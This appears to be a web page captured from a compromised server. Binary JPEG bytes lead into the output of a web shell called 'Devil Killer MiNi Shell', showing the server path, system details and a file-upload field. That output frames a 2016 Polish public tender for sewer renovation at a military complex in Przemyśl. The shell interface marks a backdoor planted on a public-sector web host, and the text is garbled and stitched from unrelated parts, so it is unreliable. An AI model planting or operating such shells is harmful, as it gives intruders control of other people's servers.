JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160205/12761-N-2016.html

<p class="kh_header"><b>Lublin: Roboty budowlane polegające na naprawie i renowacji wewnętrznej sieci kanalizacji ogólnospławnej metodą   bezwykopową   w   kompleksie   wojskowym   przy  ul.  29  Listopada  1w m. Przemyśl, woj. podkarpackie</b><br>
<b>Numer ogłoszenia: 12761 - 2016; data zamieszczenia: 05.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury w Lublinie , ul. Lipowa 1a, 20-020 Lublin, woj. lubelskie, tel. 261 183 530, faks 261 183 501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzilublin.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane polegające na naprawie i renowacji wewnętrznej sieci kanalizacji ogólnospławnej metodą   bezwykopową   w   kompleksie   wojskowym   przy  ul.  29  Listopada  1w m. Przemyśl, woj. podkarpackie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.1.Przedmiotem zamówienia są:
Roboty budowlane polegające na naprawie i renowacji wewnętrznej sieci kanalizacji ogólnospławnej metodą bezwykopową w kompleksie wojskowym przy                        ul. 29 Listopada 1w m. Przemyśl, woj. podkarpackie.
Zakres robót:
1) Mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych  o grubości  8 cm						
2)  Mechaniczne rozebranie podbudowy betonowej o grubości 12 cm
3) Ręczne wykopy ciągłe lub jamiste ze skarpami o szer. dna do 1,5 m i gł. do 1,5 m ze złożeniem urobku na odkład (kat. gruntu IV) - rurociągi	
4) Ręczne wykopy ciągłe lub jamiste ze skarpami o szer. dna do 1,5 m i gł.   do 1,5 m ze złożeniem urobku na odkład (kat. gruntu IV) - studnie	
5) Demontaż rurociągu betonowego kielichowego o średnicy nominalnej 200 mm uszczelnionego zaprawą cementową - kolizyjne uzbrojenie podziemne	
6) Demontaż rurociągu betonowego kielichowego o średnicy nominalnej 250 mm uszczelnionego zaprawą cementową - kolizyjne uzbrojenie podziemne	
7) Demontaż rurociągu betonowego kielichowego o średnicy nominalnej 300 mm uszczelnionego zaprawą cementową - kolizyjne uzbrojenie podziemne	
8) Demontaż rurociągu betonowego kielichowego o średnicy nominalnej 500 mm uszczelnionego zaprawą cementową - kolizyjne uzbrojenie podziemne	
9) Podłoża pod kanały i obiekty z materiałów sypkich o gr. 20 cm - kolizyjne uzbrojenie podziemne						
10) Kanały z rur PVC łączonych na wcisk o śr. zewn. 160 mm	
11) Kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm	
12) Kanały z rur PVC łączonych na wcisk o śr. zewn. 250 mm	
13) Kanały z rur PVC łączonych na wcisk o śr. zewn. 315 mm	
14) Kanały z rur PVC łączonych na wcisk o śr. zewn. 500 mm	
15) Demontaż studzienek ściekowych ulicznych betonowych o śr. 500 mm    z osadnikiem bez syfonu						
16) Studzienki ściekowe uliczne betonowe o śr. 500 mm z osadnikiem bez syfonu
17) Studnie kanalizacyjne systemowe - trzon studni z rur  o średnicy 1000 mm lub równoważne, na odcinku S33 do S32	
18) Studnie kanalizacyjne systemowe - prefabrykowana podstawa studni	
19) Studnie kanalizacyjne systemowe  - wyposażenie studni z prefabrykowaną podstawą						
20) Wykucie z muru każdej wmurowanej końcówki wspornika stalowego-demontaż stopni złazowych				
21) Demontaż kominów włazowych - kręgi betonowe o śr. 100 cm		
22) Demontaż kominów włazowych - pokrywy nadstudzienne żelbetowe   z włazem o śr. 120 cm							
23) Demontaż włazu żeliwnego					
24) Renowacja studni kanalizacyjnych dn1200 za pomocą systemów chemii budowlanej								
25) Osadzenie stopni płaskich lub skrzynkowych w studzienkach i komorach	
26) Kominy włazowe z kręgów betonowych - pokrywa nadstudzienna   z pierścieniem odciążającym i włazem o śr.1400/600 mm		
27) Ręczne czyszczenie kanalizacji w obiektach mieszkalnych - studzienki ściekowe podwórzowe o średnicy wewnętrznej 500 mm	
28) Wymiana krat na wpustach ulicznych				
29) Renowacja studni kanalizacyjnych dn500 za pomocą systemów chemii budowlanej								
30) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 150	
31) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 200	
32) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 250	
33) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 300	
34) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 400	
35) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 500	
36) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 500/400	
37) Czyszczenie kanału, inspekcja TV przedwykonawcza i powykonawcza, naprawa kanału rękawem renowacyjnym do kanalizacji grawitacyjnej, przepompowanie ścieków na czas wykonywania robót fi 600/450	
38) Próba wodna szczelności kanałów rurowych o śr. nom. do 150 mm	
39) Próba wodna szczelności kanałów rurowych o śr. nom. 200 mm	
40) Próba wodna szczelności kanałów rurowych o śr. nom. 250 mm	
41) Próba wodna szczelności kanałów rurowych o śr. nom 300 mm	
42) Próba wodna szczelności kanałów rurowych o śr. nominalnej 400 m
43) Próba wodna szczelności kanałów rurowych o śr. nom. 500 mm	
44) Próba wodna szczelności kanałów rurowych o śr. nom. 600 mm	
45) Zasypywanie wykopów spycharkami z przemieszczeniem gruntu na odległość do 10 m w gruncie kat. I-III				
46) Zagęszczenie nasypów zagęszczarkami; grunty sypkie kat. I-III Wskaźnik zagęszczenia Js = 1.00					
47) Zagęszczenie nasypów ubijakami mechanicznymi; grunty sypkie kat. I-III Wskaźnik zagęszczenia Js = 1.00					
48) Podbudowa z kruszywa naturalnego jednowarstwowa z domieszkami ulepszającymi z kruszywa łamanego 18 % - grubość warstwy po zagęszczeniu 30 cm							
49) Podbudowa z kruszywa naturalnego jednowarstwowa z domieszkami ulepszającymi z kruszywa łamanego 18 % - za każdy dalszy 1 cm grubości warstwy po zagęszczeniu Krotność = 15			
50) Nawierzchnia z mieszanki asfaltu lanego grysowo-żwirowej - warstwa wiążąca o grubości 10 cm						
51) Nawierzchnia z mieszanki asfaltu lanego grysowo-żwirowej - warstwa ścieralna o grubości 8 cm						
52) Utylizacja odpadów po czyszczeniu sieci kanalizacyjnej, asfaltu po rozbiórkach nawierzchni i 	gruzu wraz z wywozem		
UWAGA :
Kompleks wojskowy wpisany jest do rejestru zabytków pod nr A-706.
Oferent w cenie ryczałtowej oferty uwzględni wykonanie inwentaryzacji geodezyjnej naprawionej sieci kanalizacji ogólnospławnej.
Wykonawca zobowiązuje się do ubezpieczenia budowy z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich a powstałych w związku    z prowadzonymi robotami budowlanymi, w tym także ruchem pojazdów mechanicznych, w okresie od rozpoczęcia robót do czasu zlikwidowania terenu budowy do wysokości wartości całego kontraktu. Wykonawca złoży Zamawiającemu w terminie do 7 dni od dnia zawarcia umowy, kserokopię dokumentu stwierdzającego zakres ubezpieczenia, o którym mowa powyżej - oryginał do wglądu. Nie dostarczenie kserokopii w powyższym terminie będzie podstawą do odstąpienia od umowy przez Zamawiającego z winy Wykonawcy   i do naliczania zgodnie z §16 ust. 1, lit c) wzoru umowy kar umownych.
Wykonawca realizować będzie roboty w kompleksie wojskowym czynnym. 
Roboty będą mogły być realizowane od poniedziałku do piątku w godz. 7.00 - 15.00. Ewentualne inne terminy prowadzenia robót będą mogły być realizowane po uzyskaniu stosownych uzgodnień i zezwoleń.
Szczegółowy zakres robót określa dokumentacja projektowa tj.:
specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ
przedmiar robót stanowiący załącznik nr 2 do SIWZ
zapis cyfrowy monitoringu TV- załącznik w wersji elektronicznej do SIWZ udostępniony na stronie zamawiającego  www.rzilublin.wp.mil.pl
Wykonawca przed złożeniem oferty może dokonać wizji lokalnej celem prawidłowej wyceny oferty. 
Kontakt: Jerzy Krygowski  tel. 261 171 180 - Sekcja Obsługi Infrastruktury Przemyśl. 
UWAGA:
Zamawiający na podstawie art. 24 ust. 2a ustawy WYKLUCZY z postępowania
o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, 
w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający wykaże za pomocą dowolnych środków dowodowych.
Zamawiający NIE WYKLUCZY z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
I.2
Zamawiający nie zastrzega osobistego wykonania przez Wykonawcę kluczowych części zamówienia. W przypadku, gdy Wykonawca zamierza POWIERZYĆ WYKONANIE CZĘŚCI ZAMÓWIENIA PODWYKONAWCY musi on wskazać w ofercie zakres elementów, których wykonanie powierzy podwykonawcy.
I.3. 
W przypadku, gdy Wykonawca będzie polegał na zasobach innych podmiotów przy spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, musi wskazać w ofercie nazwę tego podmiotu.
I.4.
Wstęp OBCOKRAJOWCÓW do obiektów wojskowych może być realizowany wyłącznie na podstawie POZWOLEŃ wydanych na zasadach określonych w decyzji nr 21MON 
z dnia 10 lutego 2012 r. Ministra Obrony Narodowej w sprawie planowania i realizowania przedsięwzięć współpracy międzynarodowej w resorcie obrony narodowej (Dz. Urz. MON poz. 33). 
Powyższe ma również zastosowanie do czynności OTWARCIA OFERT - OBCOKRAJOWCY będą wpuszczani do obiektów wojskowych na otwarcie ofert 
po uzyskaniu ww POZWOLEŃ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium o niżej wymienionej wartości; 
16 254,00 zł  (słownie: szesnaście tysięcy dwieście pięćdziesiąt cztery złote 00/100)
2.Wadium może być wniesione w jednej lub w kilku następujących formach:
1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Rejonowego Zarządu Infrastruktury w Lublinie, 20-020 Lublin, ul. Lipowa 1a, konto nr: 92 1010 1339 0043 0113 9120 0000
Wadium musi być wniesione najpóźniej do godz. 1300 dnia 23.02.2016 r.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym terminie znajdzie się na rachunku bankowym Rejonowego Zarządu Infrastruktury w Lublinie.
4.Wadium w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których mowa w ustawie o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w pok. nr 117, w siedzibie Rejonowego Zarządu Infrastruktury w Lublinie, 20-020 Lublin, ul. Lipowa 1a, najpóźniej do godz. 1300 dnia 23.02.2016 r. 
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać:
a.jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
b.bezwarunkowe - na każde pisemne żądanie zgłoszone przez Rejonowy Zarząd Infrastruktury w Lublinie, 20-020 Lublin, ul. Lipowa 1a, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty Rejonowemu Zarządowi Infrastruktury w Lublinie, 20-020 Lublin, ul. Lipowa 1a, pełnej kwoty wadium w okolicznościach określonych w art. 46 ustawy Prawo zamówień publicznych.
5.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
6.Zamawiający zwraca wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ustawy prawo zamówień publicznych.
7.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ustawy prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
10.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, 
z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
11.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli: Wykonawca wykaże że w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedną (1) renowację sieci kanalizacyjnej metoda bezwykopową. Wartość roboty nie mniejsza niż 1,5 mln zł brutto. 

Każda przedstawiona w wykazie o którym mowa w pkt XVII. ppkt 5 SIWZ robota budowlana musi odpowiadać swoim rodzajem i wartością przedmiotowi zamówienia tj. winna być określona wartością nie niższą niż 1,5 mln zł brutto zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca będzie dysponował osobami posiadającymi:
1)Uprawnienia do sprawowania samodzielnych funkcji technicznych 
w budownictwie tj. kierowania robotami bez ograniczeń w specjalności:
instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych
- wymienione w art. 14., ustawy z dn. 7 lipca 1994 r.- Prawo budowlane (t.j. Dz. U. z 2013 r., poz. 1409, z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014r. r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. 24-09-2014r., poz. 1278) - osoby te winny przynależeć do właściwej Izby Samorządu Zawodowego.
2)świadectwo nadania uprawnień zawodowych do wykonywania samodzielnych funkcji  w dziedzinie geodezji i kartografii w zakresie geodezyjnych pomiarów sytuacyjno wysokościowych, realizacyjnych i inwentaryzacyjnych, zgodnie z art. 43 ust. 1 ustawy Prawo geodezyjne i kartograficzne (tekst jednolity Dz. U. nr 193 z 2010 r., poz. 1287 z późn. zm.), przy czym osoby wnoszące zmiany w zasobie geodezyjnym RZI w Lublinie po wykonaniu inwentaryzacji powykonawczej muszą posiadać poświadczenie bezpieczeństwa osobowego uprawniające do dostępu do informacji niejawnych o klauzuli co najmniej ZASTRZEŻONE lub pisemne upoważnienie uprawniające do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE, wydane przez kierownika jednostki organizacyjnej oraz  aktualne zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji niejawnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
